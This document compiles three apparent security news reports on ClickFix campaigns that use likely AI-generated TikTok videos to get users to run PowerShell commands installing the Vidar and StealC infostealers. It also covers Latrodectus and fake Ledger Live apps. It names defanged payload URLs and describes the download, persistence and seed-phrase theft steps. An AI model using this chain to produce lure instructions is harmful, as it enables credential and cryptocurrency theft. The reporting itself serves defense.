AI-Generated TikTok Videos Spread Malware Through ClickFix Attacks

TikTok videos now push infostealer malware in ClickFix attacks

Cybercriminals are using TikTok videos to trick users into infecting themselves with Vidar and StealC information-stealing malware in ClickFix attacks. As Trend Micro recently discovered, the threat actors behind this TikTok social engineering campaign are using videos likely generated using AI that ask viewers to run commands claiming to activate Windows and Microsoft Office, as well as premium features in various legitimate software like CapCut and Spotify. "This attack uses videos (possibly AI-generated) to instruct users to execute PowerShell commands, which are disguised as software activation steps. TikTok's algorithmic reach increases the likelihood of widespread exposure, with one video reaching more than half a million views," Trend Micro said. "The videos are highly similar, with only minor differences in camera angles and the download URLs used by PowerShell to fetch the payload," it added. "These suggest that the videos were likely created through automation. The instructional voice also appears AI-generated, reinforcing the likelihood that AI tools are being used to produce these videos." One of the videos claiming to provide instructions on how to "boost your Spotify experience instantly," has reached almost 500,000 views, with over 20,000 likes and more than 100 comments. In the video, the attackers prompt viewers to run a PowerShell command that will instead download and execute a remote script from hxxps://allaivo[.]me/spotify that installs Vidar or StealC information-stealing malware, launching it as a hidden process with elevated permissions. After being deployed, Vidar can take desktop screenshots and steal credentials, credit cards, cookies, cryptocurrency wallets, text files, and Authy 2FA authenticator databases. Stealc can also harvest a wide range of sensitive information from infected computers as it targets dozens of web browsers and cryptocurrency wallets. After the device is compromised, the script will download a second PowerShell script payload from hxxps://amssh[.]co/script[.]ps1 that will add a registry key to launch at startup automatically. ClickFix is a tactic where attackers employ fake errors or verification systems, such as CAPTCHA prompts, to trick potential targets into running malicious scripts to download and install malware on their devices. While generally targeting Windows users through PowerShell commands, ClickFix has also been adopted in attacks against macOS and Linux users. State-sponsored threat groups have also hacked their targets in similar attacks, with APT28 and ColdRiver (Russia), Kimsuky (North Korea), and MuddyWater (Iran) having all used these tactics in espionage campaigns in recent months. This is not the first time TikTok videos were used to push malware, with cybercriminals capitalizing on a trending TikTok challenge named 'Invisible Challenge' to infect thousands with a fake app that installed WASP Stealer (Discord Token Grabber) malware. The malware was pushed through videos that received over a million views shortly after being posted and can steal Discord accounts, passwords, credit cards, and cryptocurrency wallets. In recent years, scammers have also been flooding TikTok with fake cryptocurrency giveaways, almost all using Elon Musk, Tesla, or SpaceX themes.

Hackers Use TikTok Videos to Distribute Vidar and StealC Malware via ClickFix Technique

The malware known as Latrodectus has become the latest to embrace the widely-used social engineering technique called ClickFix as a distribution vector. "The ClickFix technique is particularly risky because it allows the malware to execute in memory rather than being written to disk," Expel said in a report shared with The Hacker News. "This removes many opportunities for browsers or security tools to detect or block the malware." Latrodectus, believed to be a successor to IcedID, is the name given to a malware that acts as a downloader for other payloads, such as ransomware. It was first documented by Proofpoint and Team Cymru in April 2024. Incidentally, the malware is one among the many malicious software to suffer an operational setback as part of Operation Endgame, which took down 300 servers worldwide and neutralized 650 domains related to Bumblebee, Lactrodectus, QakBot, HijackLoader, DanaBot, TrickBot, and WARMCOOKIE between May 19 and 22, 2025. In the latest set of Latrodectus attacks observed by Expel in May 2025, unsuspecting users are tricked into copying and executing a PowerShell command from an infected website, a tactic that has become a prevalent method to distribute a wide range of malware. "When run by a user, these commands will attempt to install a file located at the remote URL using MSIExec, and then execute it in memory," Expel said. "This keeps the attacker from having to write the file to the computer and risk being detected by the browser or an antivirus that might detect it on disk." The MSI installer contains a legitimate application from NVIDIA, which is used to sideload a malicious DLL, which then uses curl to download the main payload. To mitigate attacks of this type, it's advised to disable the Windows Run program using Group Policy Objects (GPOs) or turn off the "Windows + R" hot key via a Windows Registry change. From ClickFix to TikTok The disclosure comes as Trend Micro revealed details of a new engineering campaign that instead of relying on fake CAPTCHA pages employs TikTok videos likely generated using artificial intelligence (AI) tools to deliver the Vidar and StealC information stealers by instructing users to run malicious commands on their systems to activate Windows, Microsoft Office, CapCut, and Spotify. These videos have been posted from various TikTok accounts such as @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771. These accounts are no longer active. One of the videos claiming to provide instructions on how to "boost your Spotify experience instantly" has amassed nearly 500,000 views, with over 20,000 likes and more than 100 comments. The campaign marks a new escalation of ClickFix in that users searching for ways to activate pirated apps are verbally and visually guided to open the Windows Run dialog by pressing the "Windows + R" hot key, launch PowerShell, and run the command highlighted in the video, ultimately compromising their own systems. "Threat actors are now using TikTok videos that are potentially generated using AI-powered tools to socially engineer users into executing PowerShell commands under the guise of guiding them to activate legitimate software or unlock premium features," security researcher Junestherry Dela Cruz said. "This campaign highlights how attackers are ready to weaponize whichever social media platforms are currently popular to distribute malware." Fake Ledger Apps Used to Steal Mac Users' Seed Phrases The findings also follow the discovery of four different malware campaigns that leverage a cloned version of the Ledger Live app to steal sensitive data, including seed phrases, with the goal of draining victims' cryptocurrency wallets. The activity has been ongoing since August 2024. The attacks make use of the malicious DMG files that, when launched, launches AppleScript to exfiltrate passwords and Apple Notes data, and then download a trojanized version of Ledger Live. Once the app is opened, it warns users of a supposed account problem and that it requires their seed phrase for recovery. The entered seed phrase is sent to an attacker-controlled server. Moonlock Lab, which shed light on the campaign, said the rogue apps make use of macOS stealer malware like Atomic macOS Stealer (AMOS) and Odyssey, the latter of which introduced the novel phishing scheme in March 2025. It's worth noting that the activity overlaps with a macOS infostealer campaign that targets Ledger Live users through PyInstaller-packed binaries, as revealed by Jamf this month. "On dark web forums, chatter around anti-Ledger schemes is growing. The next wave is already taking shape," MacPaw's cybersecurity division noted. "Hackers will continue to exploit the trust crypto owners place in Ledger Live."

These AI-Generated TikTok Videos Are Tricking People Into Installing Malware

In recent years, TikTok has become a prime target for scammers and cyber attackers spreading various forms of malware, and the latest shady campaign promotes instructional videos that trick users into downloading infostealers to their devices via ClickFix attacks. The scheme, identified by Trend Micro and reported by Bleeping Computer, instructs users to execute commands to activate Windows and Microsoft Office or premium features in CapCut and Spotify. One video is captioned "Boost Your Spotify Experience Instantly -- Here's How!" and has nearly half a million views. These videos seem to be AI generated and, while the software they discuss is legitimate, the activation steps they outline are not, and will ultimately lead users to infect their devices with Vidar and StealC malware. TikTok's engagement algorithm makes it easy for such malicious videos to spread. In the past, cybercriminals have used TikTok's trending "Invisible Challenge" to spread WASP Stealer malware, which can steal Discord accounts, passwords, credit cards, and crypto wallets. Fake cryptocurrency giveaways posted on TikTok used deepfakes of Elon Musk (and themes around SpaceX and Tesla) to scam users into paying "activation" deposits using Bitcoin. ClickFix is a social engineering tactic that uses fake error messages or CAPTCHA prompts to trick users into executing a command with malicious code. Users will see a pop-up notification about a technical problem with instructions to copy and run a command (commonly a PowerShell script) to "fix" the issue. The attack most often targets Windows users, but it has been employed on macOS and Linux too. In the current TikTok campaign, the instructional videos prompt users to run a PowerShell command that installs Vidar or StealC information-stealing malware. The former can take desktop screenshots and harvest data ranging from login credentials and cookies to credit cards and crypto wallets. The latter targets web browsers and crypto wallets. Once run, the script will download a second PowerShell script allowing it to launch automatically upon device startup. It also saves in a hidden directory and deletes temporary folders so it can evade detection. Be wary of following instructional videos you're served on TikTok (as well as unsolicited technical content in general). Check the source, and only engage with those that are legitimate, like from the developer itself. You should also look for signs of AI-generated content, which may be used to spread malware widely and rapidly. There's no malicious code actually embedded in or delivered by these instructional videos -- the scheme is dependent on social engineering via verbal directions -- making the threat technically harder to detect.